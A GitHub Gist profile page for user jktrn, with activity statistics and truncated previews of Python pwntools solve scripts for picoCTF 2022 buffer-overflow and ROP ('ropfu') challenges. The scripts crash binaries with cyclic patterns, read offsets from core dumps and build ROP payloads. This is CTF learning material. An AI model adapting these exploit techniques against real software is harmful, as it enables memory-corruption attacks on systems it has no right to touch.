Skip to content

Instantly share code, notes, and snippets.

View jktrn's full-sized avatar

enscribe jktrn

View GitHub Profile
⭐ Total Stars: 10
➕ Total Commits: 852
🔀 Total PRs: 10
🚩 Total Issues: 22
📦 Contributed to: 13
MDX 11 hrs 3 mins █████████▊░░░░░░░░░░░ 46.6%
JavaScript 10 hrs 30 mins █████████▎░░░░░░░░░░░ 44.3%
Markdown 48 mins ▋░░░░░░░░░░░░░░░░░░░░ 3.4%
CSS 36 mins ▌░░░░░░░░░░░░░░░░░░░░ 2.5%
Other 20 mins ▎░░░░░░░░░░░░░░░░░░░░ 1.5%
Sewerslvt █████▊░░░░░░░░░░░ 70 plays
Machine Girl ██░░░░░░░░░░░░░░░ 25 plays
Kendrick Lamar █▉░░░░░░░░░░░░░░░ 23 plays
My Dead Girlfriend █▊░░░░░░░░░░░░░░░ 22 plays
Caligula's Horse █▏░░░░░░░░░░░░░░░ 14 plays
Camellia █▏░░░░░░░░░░░░░░░ 14 plays
Iapetus █▏░░░░░░░░░░░░░░░ 14 plays
Crystal Castles ▉░░░░░░░░░░░░░░░░ 11 plays
An Abstract Illusion ▍░░░░░░░░░░░░░░░░ 6 plays
CQ ▍░░░░░░░░░░░░░░░░ 6 plays
HTML +1.9k/ -346 █████████▎░░░░░░░░░░░ 44.2%
SVG +20/ -0 ██████▍░░░░░░░░░░░░░░ 30.8%
Markdown +1.5k/ -146 ████▊░░░░░░░░░░░░░░░░ 22.8%
CSS +143/ -120 ▏░░░░░░░░░░░░░░░░░░░░ 1.1%
XML +49/ -40 ▏░░░░░░░░░░░░░░░░░░░░ 0.7%
JavaScript +26/ -7 ░░░░░░░░░░░░░░░░░░░░░ 0.3%
Text +9/ -8 ░░░░░░░░░░░░░░░░░░░░░ 0.2%
Stylus +11/ -0 ░░░░░░░░░░░░░░░░░░░░░ 0.0%
TypeScript +2/ -1 ░░░░░░░░░░░░░░░░░░░░░ 0.0%
@jktrn
jktrn / I'm a night 🦉
Last active October 13, 2022 01:48
🌎
🌞 Morning 43 commits █▉░░░░░░░░░░░░░░░░░░░ 9.4%
🌆 Daytime 179 commits ████████▏░░░░░░░░░░░░ 39.2%
🌃 Evening 204 commits █████████▎░░░░░░░░░░░ 44.6%
🌙 Night 31 commits █▍░░░░░░░░░░░░░░░░░░░ 6.8%
@jktrn
jktrn / buffer-overflow3.py
Created July 17, 2022 00:37
Solve for the pwn/binary challenge "Buffer overflow 3" from the picoCTF 2022 competition.
#!/usr/bin/env python3
from pwn import *
from string import printable
elf = context.binary = ELF("./vuln", checksec=False)
host, port = "saturn.picoctf.net", [PORT]
offset = 64
def new_process():
if args.LOCAL:
@jktrn
jktrn / buffer-overflow-2-automated.py
Last active June 17, 2022 04:56
Automated solve for the pwn/binary challenge "Buffer overflow 2" from the picoCTF 2022 competition.
from pwn import *
elf = context.binary = ELF('./vuln') # sets context + elf object
rop = ROP(elf) # creates ROP object
host, port = 'saturn.picoctf.net', [PORT]
p = process(elf.path) # creates local process w/ elf object
p.sendline(cyclic(128)) # sends cyclic pattern to crash
p.wait() # sigsegv generates core dump
core = Coredump('./core') # parses core dump file
@jktrn
jktrn / buffer-overflow-2.py
Last active June 17, 2022 04:56
Solve for the pwn/binary challenge "Buffer overflow 2" from the picoCTF 2022 competition.
from pwn import *
elf = context.binary = ELF('./vuln') # sets context + elf object
host, port = 'saturn.picoctf.net', [PORT]
p = process(elf.path) # creates local process w/ elf object
p.sendline(cyclic(128)) # sends cyclic pattern to crash
p.wait() # sigsegv generates core dump
core = Coredump('./core') # parses core dump file
@jktrn
jktrn / buffer-overflow-1-automated.py
Last active June 17, 2022 04:56
Automated solve for the pwn/binary challenge "Buffer overflow 1" from the picoCTF 2022 competition.
from pwn import *
elf = context.binary = ELF('./vuln') # sets context + elf object
host, port = 'saturn.picoctf.net', [PORT]
p = process(elf.path) # references elf object
p.sendline(cyclic(128)) # sends cyclic pattern to crash
p.wait() # sigsegv generates core dump
core = Coredump('./core') # parse core dump file
@jktrn
jktrn / ropfu.py
Created June 15, 2022 16:32
Solve for the pwn/binary challenge "ropfu" from the picoCTF 2022 competition.
#!/usr/bin/env python2
from pwn import *
from struct import pack
payload = 'A'*28
payload += pack('<I', 0x080583c9) # pop edx ; pop ebx ; ret
payload += pack('<I', 0x080e5060) # @ .data
payload += pack('<I', 0x41414141) # padding
payload += pack('<I', 0x080b074a) # pop eax ; ret